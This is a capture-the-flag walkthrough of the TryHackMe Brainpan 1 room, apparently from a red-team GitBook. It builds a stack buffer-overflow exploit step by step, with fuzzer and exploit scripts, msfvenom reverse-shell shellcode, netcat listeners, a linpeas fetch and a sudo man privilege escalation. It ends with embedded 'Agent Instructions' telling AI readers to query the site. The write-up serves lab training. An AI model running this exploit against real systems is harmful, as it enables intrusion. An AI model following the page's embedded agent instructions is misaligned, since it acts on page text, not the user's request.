# Brainpan 1 **Room Link:** ## Scanning ``` nmap -A $VICTIM ```

``` nmap -sV -sT -O -p 1-65535 $VICTIM ```

### Abyss/TCP port 9999 Abyss appears to have a program running but we can't interact. ![](/files/CAYNnpUvhBn9xZ4xOODL) ``` gobuster dir -u http://$VICTIM:9999 -w /usr/share/dirb/wordlists/big.txt -t 50 ```

### http/TCP port 10000 ``` gobuster dir -u http://$VICTIM:10000 -w /usr/share/dirb/wordlists/big.txt -t 50 ```

brainpan.exe file found.

## Initial Shell ### Test Machine As we have the .exe we're going to test on our Windows lab machine. ``` xfreerdp /u:admin /p:password /cert:ignore /v:$TESTMACHINE /workarea +clipboard python2 -m SimpleHTTPServer 81 ```

### **Crash Replication & Controlling EIP** I crashed the program by sending 1000 As ``` python -c 'print("A"* 1000)' nc -v $TESTMACHINE 31337 ``` **fuzzer.py** ``` #!/usr/bin/env python3 import socket, time, sys try: ip = str(sys.argv[1]) port = int(sys.argv[2]) print (ip+":"+str(port)) timeout = 5 prefix = "" string = prefix + "A" * 100 while True: try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(timeout) s.connect((ip, port)) print("Fuzzing with {} bytes".format(len(string) - len(prefix))) s.send(bytes(string, "latin-1")) except: print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) sys.exit(0) string += 100 * "A" time.sleep(1) except: print ("\nCould not connect!") sys.exit() ``` Fuzzer was able to crash the program around 1000 bytes so we got really lucky when we sent our As ``` python fuzzer.py $VICTIM 1337 ```

``` /opt/metasploit-framework-5101/tools/exploit/pattern_create.rb -l 1000 ``` #### **exploit.py - Code Changes #1** I added the pattern\_create output into the payload variable ``` import socket, time, sys try: ip = str(sys.argv[1]) port = int(sys.argv[2]) print (ip+":"+str(port)) prefix = "" offset = 0 overflow = "A" * offset retn = "" padding = "" payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.") except: print ("\nCould not connect!") sys.exit() ``` On kail run the exploit again then in mona run the following to get the offset for EIP. We were able to find the offset was 524. **Kali** ``` python exploit.py $VICTIM 9999 ``` **Immunity Debugger** ``` !mona findmsp -distance 1000 ```

**exploit.py - Code Changes #2** ``` import socket, time, sys try: ip = str(sys.argv[1]) port = int(sys.argv[2]) print (ip+":"+str(port)) prefix = "" offset = 524 overflow = "A" * offset retn = "BBBB" padding = "" payload = "" postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.") except: print ("\nCould not connect!") sys.exit() ``` **Kali** After running the program again we now can fill EIP with our Bs so we now have control of EIP. ``` python exploit.py $VICTIM 1337 ```

### Finding Bad Characters **Kali** Now we changed the program to look for bad characters so we don't later use those bad characters when generating our payload. We do this by setting our payload to all possible characters, than follow EIP to see which characters aren't showing up. To do this we just have to keep running our exploit and removing the bad characters one by one. We found no bad characters so we'll just add \x00. **exploit.py - Code Changes #3** ``` import socket, time, sys #Bad chars found: \x00 badChars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f" "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f" "\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f" "\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f" "\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f" "\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf" "\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf" "\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef" "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) try: ip = str(sys.argv[1]) port = int(sys.argv[2]) print (ip+":"+str(port)) prefix = "" offset = 524 overflow = "A" * offset retn = "BBBB" padding = "" payload = badChars postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.") except: print ("\nCould not connect!") sys.exit() ```

### Finding a Jump Point Now we need to find a place to jump to to run our payload. We find there is only one place that will meets our conditions that we need which is an address with SafeSEH, ASLR, and NXCompat disabled and the memory address doesn't start with 0x00. ex: 0x0040000 won't work, 0x100000 will work. 0x311700000 is the only possible address to use. **Immunity Debugger** ``` !mona modules ```

We find that brainpan.exe has only one possible JMP ESPs to use. So we will try 0x311712f3 but when we add it to our code we need it in little endian format so it becomes \xf3\x12\x17\31. **Immunity Debugger** ``` !mona find -s "\xff\xe4" -m brainpan.exe ```

### Exploit - Staging Now that we have the return address to use, we just need to generate our payload without using the bad characters found previously. I also added 16 NOPs before the payload as suggested in the room. All that is left is to is to update our code with our payload and run it against the program. ``` msfvenom -p windows/shell_reverse_tcp LHOST=$KALI LPORT=4444 EXITFUNC=thread -b "\x00" -f c ``` #### **exploit.py - Code Changes #4** ``` import socket, time, sys try: ip = str(sys.argv[1]) port = int(sys.argv[2]) print (ip+":"+str(port)) prefix = "" offset = 524 overflow = "A" * offset retn = "\xf3\x12\x17\x31" padding = "\x90" * 16 payload = ("\xbb\x27\x8f\x81\x23\xdb\xd8\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" "\x52\x31\x5f\x12\x83\xef\xfc\x03\x78\x81\x63\xd6\x7a\x75\xe1" "\x19\x82\x86\x86\x90\x67\xb7\x86\xc7\xec\xe8\x36\x83\xa0\x04" "\xbc\xc1\x50\x9e\xb0\xcd\x57\x17\x7e\x28\x56\xa8\xd3\x08\xf9" "\x2a\x2e\x5d\xd9\x13\xe1\x90\x18\x53\x1c\x58\x48\x0c\x6a\xcf" "\x7c\x39\x26\xcc\xf7\x71\xa6\x54\xe4\xc2\xc9\x75\xbb\x59\x90" "\x55\x3a\x8d\xa8\xdf\x24\xd2\x95\x96\xdf\x20\x61\x29\x09\x79" "\x8a\x86\x74\xb5\x79\xd6\xb1\x72\x62\xad\xcb\x80\x1f\xb6\x08" "\xfa\xfb\x33\x8a\x5c\x8f\xe4\x76\x5c\x5c\x72\xfd\x52\x29\xf0" "\x59\x77\xac\xd5\xd2\x83\x25\xd8\x34\x02\x7d\xff\x90\x4e\x25" "\x9e\x81\x2a\x88\x9f\xd1\x94\x75\x3a\x9a\x39\x61\x37\xc1\x55" "\x46\x7a\xf9\xa5\xc0\x0d\x8a\x97\x4f\xa6\x04\x94\x18\x60\xd3" "\xdb\x32\xd4\x4b\x22\xbd\x25\x42\xe1\xe9\x75\xfc\xc0\x91\x1d" "\xfc\xed\x47\xb1\xac\x41\x38\x72\x1c\x22\xe8\x1a\x76\xad\xd7" "\x3b\x79\x67\x70\xd1\x80\xe0\x75\x2c\x79\x4f\xe1\x32\x7d\xa1" "\xae\xbb\x9b\xab\x5e\xea\x34\x44\xc6\xb7\xce\xf5\x07\x62\xab" "\x36\x83\x81\x4c\xf8\x64\xef\x5e\x6d\x85\xba\x3c\x38\x9a\x10" "\x28\xa6\x09\xff\xa8\xa1\x31\xa8\xff\xe6\x84\xa1\x95\x1a\xbe" "\x1b\x8b\xe6\x26\x63\x0f\x3d\x9b\x6a\x8e\xb0\xa7\x48\x80\x0c" "\x27\xd5\xf4\xc0\x7e\x83\xa2\xa6\x28\x65\x1c\x71\x86\x2f\xc8" "\x04\xe4\xef\x8e\x08\x21\x86\x6e\xb8\x9c\xdf\x91\x75\x49\xe8" "\xea\x6b\xe9\x17\x21\x28\x09\xfa\xe3\x45\xa2\xa3\x66\xe4\xaf" "\x53\x5d\x2b\xd6\xd7\x57\xd4\x2d\xc7\x12\xd1\x6a\x4f\xcf\xab" "\xe3\x3a\xef\x18\x03\x6f") postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.") except: print ("\nCould not connect!") sys.exit() ``` **Kali #1** ``` nc -lvnp 4444 ``` **Kali #2** ``` python exploit.py $TESTMACHINE 9999 ```

### Exploit - Production #1 The program worked against our staging environment so it should work against the actual box we're trying to exploit. It ends up working with exploit.py. **Kali #1** ``` rlwrap nc -lvnp 4444 ``` **Kali #2** ``` python exploit.py $VICTIM 9999 ```

### Exploit - Production #2 Shortly after exploring the Victims OS it had the directory of a Linux server. I realized that it was running. ``` msfvenom -p linux/x86/shell_reverse_tcp LHOST=$KALI LPORT=4444 EXITFUNC=thread -b "\x00" -f c ``` #### **exploit.py - Code Changes #4** ``` import socket, time, sys try: ip = str(sys.argv[1]) port = int(sys.argv[2]) print (ip+":"+str(port)) prefix = "" offset = 524 overflow = "A" * offset retn = "\xf3\x12\x17\x31" padding = "\x90" * 16 payload = ("\xd9\xc9\xd9\x74\x24\xf4\x5f\xba\xec\xbf\x44\xe4\x29\xc9\xb1" "\x12\x31\x57\x17\x03\x57\x17\x83\x03\x43\xa6\x11\xea\x67\xd0" "\x39\x5f\xdb\x4c\xd4\x5d\x52\x93\x98\x07\xa9\xd4\x4a\x9e\x81" "\xea\xa1\xa0\xab\x6d\xc3\xc8\x21\x84\xc0\xb7\x5e\x9a\x26\xd6" "\xc2\x13\xc7\x68\x9c\x73\x59\xdb\xd2\x77\xd0\x3a\xd9\xf8\xb0" "\xd4\x8c\xd7\x47\x4c\x39\x07\x87\xee\xd0\xde\x34\xbc\x71\x68" "\x5b\xf0\x7d\xa7\x1c") postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.") except: print ("\nCould not connect!") sys.exit() ``` **Kali #1** ``` nc -lvnp 4444 ``` **Kali #2** ``` python exploit.py $VICTIM 9999 ``` **Victim** ``` python3 -c 'import pty;pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ```

### **Transfer LinPeas** I tried transfering LinPeas but it didn't end up really using anything from the output. **Kali** ``` wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh python2 -m SimpleHTTPServer 81 ``` **Victim** ``` wget http://10.10.243.191:81/linpeas.sh chmod +x linpeas.sh ./linpeas.sh ``` ## Privilege Escalation We discovered we can run the command anansi\_util as sudo without a password. gtfobins showed a way to become root if we can run manual which the program allowed us to do. **Exploit:**

``` sudo -l sudo /home/anansi/bin/anansi_util manual ```

We are able to run the commands mentioned on gtfobins and get a root shell.

sudo /home/anansi/bin/anansi_util manual man
!/bin/sh
whoami

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/brainpan-1.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.